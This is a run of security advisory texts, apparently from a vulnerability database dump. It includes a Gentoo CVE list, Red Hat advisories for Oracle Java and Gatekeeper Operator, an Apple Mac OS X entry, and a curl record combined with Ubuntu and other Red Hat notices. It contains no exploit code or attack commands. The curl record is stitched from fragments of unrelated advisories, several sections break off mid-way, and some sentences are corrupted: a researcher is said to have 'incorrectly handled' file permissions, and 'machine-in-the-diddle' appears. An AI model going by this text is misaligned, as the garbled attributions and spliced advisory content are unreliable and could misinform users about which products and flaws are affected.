http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776 [ 170 ] CVE-2013-5777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777 [ 171 ] CVE-2013-5778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778 [ 172 ] CVE-2013-5780 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780 [ 173 ] CVE-2013-5782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782 [ 174 ] CVE-2013-5783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783 [ 175 ] CVE-2013-5784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784 [ 176 ] CVE-2013-5787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787 [ 177 ] CVE-2013-5788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788 [ 178 ] CVE-2013-5789 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789 [ 179 ] CVE-2013-5790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790 [ 180 ] CVE-2013-5797 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797 [ 181 ] CVE-2013-5800 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800 [ 182 ] CVE-2013-5801 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801 [ 183 ] CVE-2013-5802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802 [ 184 ] CVE-2013-5803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803 [ 185 ] CVE-2013-5804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804 [ 186 ] CVE-2013-5805 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805 [ 187 ] CVE-2013-5806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806 [ 188 ] CVE-2013-5809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809 [ 189 ] CVE-2013-5810 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810 [ 190 ] CVE-2013-5812 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812 [ 191 ] CVE-2013-5814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814 [ 192 ] CVE-2013-5817 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817 [ 193 ] CVE-2013-5818 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818 [ 194 ] CVE-2013-5819 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819 [ 195 ] CVE-2013-5820 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820 [ 196 ] CVE-2013-5823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823 [ 197 ] CVE-2013-5824 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824 [ 198 ] CVE-2013-5825 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825 [ 199 ] CVE-2013-5829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829 [ 200 ] CVE-2013-5830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830 [ 201 ] CVE-2013-5831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831 [ 202 ] CVE-2013-5832 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832 [ 203 ] CVE-2013-5838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838 [ 204 ] CVE-2013-5840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840 [ 205 ] CVE-2013-5842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842 [ 206 ] CVE-2013-5843 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843 [ 207 ] CVE-2013-5844 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844 [ 208 ] CVE-2013-5846 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846 [ 209 ] CVE-2013-5848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848 [ 210 ] CVE-2013-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849 [ 211 ] CVE-2013-5850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850 [ 212 ] CVE-2013-5851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851 [ 213 ] CVE-2013-5852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852 [ 214 ] CVE-2013-5854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854 [ 215 ] CVE-2013-5870 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870 [ 216 ] CVE-2013-5878 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878 [ 217 ] CVE-2013-5887 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887 [ 218 ] CVE-2013-5888 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888 [ 219 ] CVE-2013-5889 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889 [ 220 ] CVE-2013-5893 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893 [ 221 ] CVE-2013-5895 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895 [ 222 ] CVE-2013-5896 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896 [ 223 ] CVE-2013-5898 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898 [ 224 ] CVE-2013-5899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899 [ 225 ] CVE-2013-5902 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902 [ 226 ] CVE-2013-5904 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904 [ 227 ] CVE-2013-5905 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905 [ 228 ] CVE-2013-5906 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906 [ 229 ] CVE-2013-5907 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907 [ 230 ] CVE-2013-5910 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910 [ 231 ] CVE-2014-0368 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368 [ 232 ] CVE-2014-0373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373 [ 233 ] CVE-2014-0375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375 [ 234 ] CVE-2014-0376 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376 [ 235 ] CVE-2014-0382 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382 [ 236 ] CVE-2014-0385 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385 [ 237 ] CVE-2014-0387 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387 [ 238 ] CVE-2014-0403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403 [ 239 ] CVE-2014-0408 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408 [ 240 ] CVE-2014-0410 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410 [ 241 ] CVE-2014-0411 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411 [ 242 ] CVE-2014-0415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415 [ 243 ] CVE-2014-0416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416 [ 244 ] CVE-2014-0417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417 [ 245 ] CVE-2014-0418 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418 [ 246 ] CVE-2014-0422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422 [ 247 ] CVE-2014-0423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423 [ 248 ] CVE-2014-0424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424 [ 249 ] CVE-2014-0428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201401-30.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: java-1.7.0-oracle security update Advisory ID: RHSA-2013:0532-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0532.html Issue date: 2013-02-20 CVE Names: CVE-2013-0169 CVE-2013-1484 CVE-2013-1485 CVE-2013-1486 CVE-2013-1487 ===================================================================== 1. Summary: Updated java-1.7.0-oracle packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory page, listed in the References section. (CVE-2013-0169, CVE-2013-1484, CVE-2013-1485, CVE-2013-1486, CVE-2013-1487) All users of java-1.7.0-oracle are advised to upgrade to these updated packages, which provide Oracle Java 7 Update 15 and resolve these issues. All running instances of Oracle Java must be restarted for the update to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 907589 - CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13) 913014 - CVE-2013-1486 OpenJDK: MBeanServer insufficient privilege restrictions (JMX, 8006446) 913021 - CVE-2013-1484 OpenJDK: MethodHandleProxies insufficient privilege checks (Libraries, 8004937) 913025 - CVE-2013-1485 OpenJDK: MethodHandles insufficient privilege checks (Libraries, 8006439) 913030 - CVE-2013-1487 Oracle JDK: unspecified vulnerability fixed in 6u41 and 7u15 (Deployment) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: java-1.7.0-oracle-1.7.0.15-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-devel-1.7.0.15-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-javafx-1.7.0.15-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-jdbc-1.7.0.15-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-plugin-1.7.0.15-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-src-1.7.0.15-1jpp.1.el5_9.i386.rpm x86_64: java-1.7.0-oracle-1.7.0.15-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.15-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.15-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.15-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.15-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-src-1.7.0.15-1jpp.1.el5_9.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: java-1.7.0-oracle-1.7.0.15-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-devel-1.7.0.15-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-javafx-1.7.0.15-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-jdbc-1.7.0.15-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-plugin-1.7.0.15-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-src-1.7.0.15-1jpp.1.el5_9.i386.rpm x86_64: java-1.7.0-oracle-1.7.0.15-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.15-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.15-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.15-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.15-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-src-1.7.0.15-1jpp.1.el5_9.x86_64.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: java-1.7.0-oracle-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-devel-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-javafx-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-jdbc-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-plugin-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-src-1.7.0.15-1jpp.1.el6_3.i686.rpm x86_64: java-1.7.0-oracle-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-src-1.7.0.15-1jpp.1.el6_3.x86_64.rpm Red Hat Enterprise Linux HPC Node Supplementary (v. 6): x86_64: java-1.7.0-oracle-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-src-1.7.0.15-1jpp.1.el6_3.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: java-1.7.0-oracle-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-devel-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-javafx-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-jdbc-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-plugin-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-src-1.7.0.15-1jpp.1.el6_3.i686.rpm x86_64: java-1.7.0-oracle-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-src-1.7.0.15-1jpp.1.el6_3.x86_64.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: java-1.7.0-oracle-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-devel-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-javafx-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-jdbc-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-plugin-1.7.0.15-1jpp.1.el6_3.i686.rpm java-1.7.0-oracle-src-1.7.0.15-1jpp.1.el6_3.i686.rpm x86_64: java-1.7.0-oracle-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.15-1jpp.1.el6_3.x86_64.rpm java-1.7.0-oracle-src-1.7.0.15-1jpp.1.el6_3.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-0169.html https://www.redhat.com/security/data/cve/CVE-2013-1484.html https://www.redhat.com/security/data/cve/CVE-2013-1485.html https://www.redhat.com/security/data/cve/CVE-2013-1486.html https://www.redhat.com/security/data/cve/CVE-2013-1487.html https://access.redhat.com/security/updates/classification/#critical http://www.oracle.com/technetwork/topics/security/javacpufeb2013update-1905892.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFRJUSoXlSAg2UNWIIRApnLAKDDCr8p4FK55sLdVz1eV6sGs3R+CQCfVOUb RLHyvntpIS7H+s7ynB2d1Yg= =AYgd -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
var-200608-0042 OpenSSH in Apple Mac OS X 10.4.7 allows remote attackers to cause a denial of service or determine account existence by attempting to log in using an invalid user, which causes the server to hang. The Apple Mac OS X ImageIO framework contains an integer overflow that may allow a remote attacker to execute arbitrary code on an affected system. These issue affect Mac OS X and various applications including AFP Server, Bluetooth, Bom, DHCP, Image RAW, ImageIO, Launch Services, OpenSSH, and WebKit. A remote attacker may exploit these issues to execute arbitrary code, trigger denial-of-service conditions, escalate privileges, and disclose potentially sensitive information. Attackers can use this behavior to detect whether a specific account exists, and a large number of attempts can also cause a denial of service
var-202206-1900 curl < 7.84.0 supports "chained" HTTP compression algorithms, meaning that a serverresponse can be compressed multiple times and potentially with different algorithms. The number of acceptable "links" in this "decompression chain" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.The use of such a decompression chain could result in a "malloc bomb", makingcurl end up spending enormous amounts of allocated heap memory, or trying toand returning out of memory errors. (CVE-2022-32207). 8) - aarch64, ppc64le, s390x, x86_64 3. Description: The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP. Bugs fixed (https://bugzilla.redhat.com/): 2099300 - CVE-2022-32206 curl: HTTP compression denial of service 2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification 6. Description: Submariner enables direct networking between pods and services on different Kubernetes clusters that are either on-premises or in the cloud. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release: https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/ Security fixes: * golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629) * moment: inefficient parsing algorithim resulting in DoS (CVE-2022-31129) * nodejs16: CRLF injection in node-undici (CVE-2022-31150) * nodejs/undici: Cookie headers uncleared on cross-origin redirect (CVE-2022-31151) * vm2: Sandbox Escape in vm2 (CVE-2022-36067) Bug fixes: * RHACM 2.4 using deprecated APIs in managed clusters (BZ# 2041540) * vSphere network name doesn't allow entering spaces and doesn't reflect YAML changes (BZ# 2074766) * cluster update status is stuck, also update is not even visible (BZ# 2079418) * Policy that creates cluster role is showing as not compliant due to Request entity too large message (BZ# 2088486) * Upgraded from RHACM 2.2-->2.3-->2.4 and cannot create cluster (BZ# 2089490) * ACM Console Becomes Unusable After a Time (BZ# 2097464) * RHACM 2.4.6 images (BZ# 2100613) * Cluster Pools with conflicting name of existing clusters in same namespace fails creation and deletes existing cluster (BZ# 2102436) * ManagedClusters in Pending import state after ACM hub migration (BZ# 2102495) 3. Bugs fixed (https://bugzilla.redhat.com/): 2041540 - RHACM 2.4 using deprecated APIs in managed clusters 2074766 - vSphere network name doesn't allow entering spaces and doesn't reflect YAML changes 2079418 - cluster update status is stuck, also update is not even visible 2088486 - Policy that creates cluster role is showing as not compliant due to Request entity too large message 2089490 - Upgraded from RHACM 2.2-->2.3-->2.4 and cannot create cluster 2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add 2097464 - ACM Console Becomes Unusable After a Time 2100613 - RHACM 2.4.6 images 2102436 - Cluster Pools with conflicting name of existing clusters in same namespace fails creation and deletes existing cluster 2102495 - ManagedClusters in Pending import state after ACM hub migration 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS 2109354 - CVE-2022-31150 nodejs16: CRLF injection in node-undici 2121396 - CVE-2022-31151 nodejs/undici: Cookie headers uncleared on cross-origin redirect 2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2 5. Summary: OpenShift API for Data Protection (OADP) 1.0.4 is now available. Description: OpenShift API for Data Protection (OADP) enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes. Description: OpenShift sandboxed containers support for OpenShift Container Platform provides users with built-in support for running Kata containers as an additional, optional runtime. Space precludes documenting all of the updates to OpenShift sandboxed containers in this advisory. ========================================================================== Ubuntu Security Notice USN-5495-1 June 27, 2022 curl vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 22.04 LTS - Ubuntu 21.10 - Ubuntu 20.04 LTS - Ubuntu 18.04 LTS Summary: Several security issues were fixed in curl. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32205) Harry Sintonen discovered that curl incorrectly handled certain HTTP compressions. An attacker could possibly use this issue to cause a denial of service. (CVE-2022-32206) Harry Sintonen incorrectly handled certain file permissions. An attacker could possibly use this issue to expose sensitive information. This issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207) Harry Sintonen discovered that curl incorrectly handled certain FTP-KRB messages. An attacker could possibly use this to perform a machine-in-the-diddle attack. (CVE-2022-32208) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 22.04 LTS: curl 7.81.0-1ubuntu1.3 libcurl3-gnutls 7.81.0-1ubuntu1.3 libcurl3-nss 7.81.0-1ubuntu1.3 libcurl4 7.81.0-1ubuntu1.3 Ubuntu 21.10: curl 7.74.0-1.3ubuntu2.3 libcurl3-gnutls 7.74.0-1.3ubuntu2.3 libcurl3-nss 7.74.0-1.3ubuntu2.3 libcurl4 7.74.0-1.3ubuntu2.3 Ubuntu 20.04 LTS: curl 7.68.0-1ubuntu2.12 libcurl3-gnutls 7.68.0-1ubuntu2.12 libcurl3-nss 7.68.0-1ubuntu2.12 libcurl4 7.68.0-1ubuntu2.12 Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.19 libcurl3-gnutls 7.58.0-2ubuntu3.19 libcurl3-nss 7.58.0-2ubuntu3.19 libcurl4 7.58.0-2ubuntu3.19 In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: Gatekeeper Operator v0.2 security and container updates Advisory ID: RHSA-2022:6348-01 Product: Red Hat ACM Advisory URL: https://access.redhat.com/errata/RHSA-2022:6348 Issue date: 2022-09-06 CVE Names: CVE-2021-40528 CVE-2022-1292 CVE-2022-1586 CVE-2022-1705 CVE-2022-1962 CVE-2022-2068 CVE-2022-2097 CVE-2022-2526 CVE-2022-28131 CVE-2022-29824 CVE-2022-30629 CVE-2022-30630 CVE-2022-30631 CVE-2022-30632 CVE-2022-30633 CVE-2022-30635 CVE-2022-32148 CVE-2022-32206 CVE-2022-32208 ===================================================================== 1. Summary: Gatekeeper Operator v0.2 security updates Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Gatekeeper Operator v0.2 Gatekeeper is an open source project that applies the OPA Constraint Framework to enforce policies on your Kubernetes clusters. This advisory contains the container images for Gatekeeper that include bug fixes and container upgrades. Note: Gatekeeper support from the Red Hat support team is limited to where it is integrated and used with Red Hat Advanced Cluster Management for Kubernetes. For support options for any other use, see the Gatekeeper open source project website at: https://open-policy-agent.github.io/gatekeeper/website/docs/howto/. Security fix: * CVE-2022-30629: gatekeeper-container: golang: crypto/tls: session tickets lack random ticket_age_add * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-28131: golang: encoding/xml: stack exhaustion in Decoder.Skip * CVE-2022-30630: golang: io/fs: stack exhaustion in Glob * CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read * CVE-2022-30632: golang: path/filepath: stack exhaustion in Glob * CVE-2022-30635: golang: encoding/gob: stack exhaustion in Decoder.Decode * CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal * CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working 3. Solution: The requirements to apply the upgraded images are different whether or not you used the operator. Complete the following steps, depending on your installation: * Upgrade gatekeeper operator: The gatekeeper operator that is installed by the gatekeeper operator policy has `installPlanApproval` set to `Automatic`. This setting means the operator will be upgraded automatically when there is a new version of the operator. No further action is required for upgrade. If you changed the setting for `installPlanApproval` to `manual`, then you must view each cluster to manually approve the upgrade to the operator. * Upgrade gatekeeper without the operator: The gatekeeper version is specified as part of the Gatekeeper CR in the gatekeeper operator policy. To upgrade the gatekeeper version: a) Determine the latest version of gatekeeper by visiting: https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. b) Click the tag dropdown, and find the latest static tag. An example tag is 'v3.3.0-1'. c) Edit the gatekeeper operator policy and update the image tag to use the latest static tag. For example, you might change this line to image: 'registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1'. Refer to https://open-policy-agent.github.io/gatekeeper/website/docs/howto/ for additional information. 4. Bugs fixed (https://bugzilla.redhat.com/): 2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add 2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read 2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob 2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header 2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions 2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working 2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob 2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode 2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip 2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal 5. References: https://access.redhat.com/security/cve/CVE-2021-40528 https://access.redhat.com/security/cve/CVE-2022-1292 https://access.redhat.com/security/cve/CVE-2022-1586 https://access.redhat.com/security/cve/CVE-2022-1705 https://access.redhat.com/security/cve/CVE-2022-1962 https://access.redhat.com/security/cve/CVE-2022-2068 https://access.redhat.com/security/cve/CVE-2022-2097 https://access.redhat.com/security/cve/CVE-2022-2526 https://access.redhat.com/security/cve/CVE-2022-28131 https://access.redhat.com/security/cve/CVE-2022-29824 https://access.redhat.com/security/cve/CVE-2022-30629 https://access.redhat.com/security/cve/CVE-2022-30630 https://access.redhat.com/security/cve/CVE-2022-30631 https://access.redhat.com/security/cve/CVE-2022-30632 https://access.redhat.com/security/cve/CVE-2022-30633 https://access.redhat.com/security/cve/CVE-2022-30635 https://access.redhat.com/security/cve/CVE-2022-32148 https://access.redhat.com/security/cve/CVE-2022-32206 https://access.redhat.com/security/cve/CVE-2022-32208 https://access.redhat.com/security/updates/classification/#moderate 6. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYxd1LNzjgjWX9erEAQi7KxAAjtYnTUInhFC8FJ6zXunwhBa8YpT3E6Ym hemyRubgeyUdhySlgfPFmhrEU6nT3CUmzVN11wQu9iVmUzg3V/x+WhvMK371313m 7XzE0nuZ5uZRxXGVr8dqoecgm47t2884+QzGO4cMIsK5ojfHLBY6oeYunjW6lC5/ 7P40TjANWdZMirOmxoOk3OHeYpFC9oIiovidDn7zqf3PFOa50ux6w4P/3Dep5qVl W1BaNJkWxRL5Uj2AiyxtnLR2Tg713ocazkZZ83nJdr2eMoFFJL7l7u/W2m9LS5rN UhwHejs+4kizsumeCRFyq5I67vmkGE2EMun3yKZDGNB8xgxQqkaOBTkcF4qzzgOt +cLhTRiuGXS4NETqYaWGE0n0kmFCE5jFbZaOlp9L1C56LtB4Ob6BSK/qtdl8wmMB Ap8POcwOp/6TM2SfXg27TzYyYdA3T8EDG4NcZJ05Kt/QsEm7odWa8qMQrBLx+vBs AzDqEoMuL6yPuU4TfpmUI19M3kCGq3dK6jvMv7PA3xn2XQnBfxgIZv5ayibOoM+G 4zhJAs44wO9xEb95fVUego6k3PME3r4u2az8CGBNBcNb9S56yktm3cfxfJv9fc6T 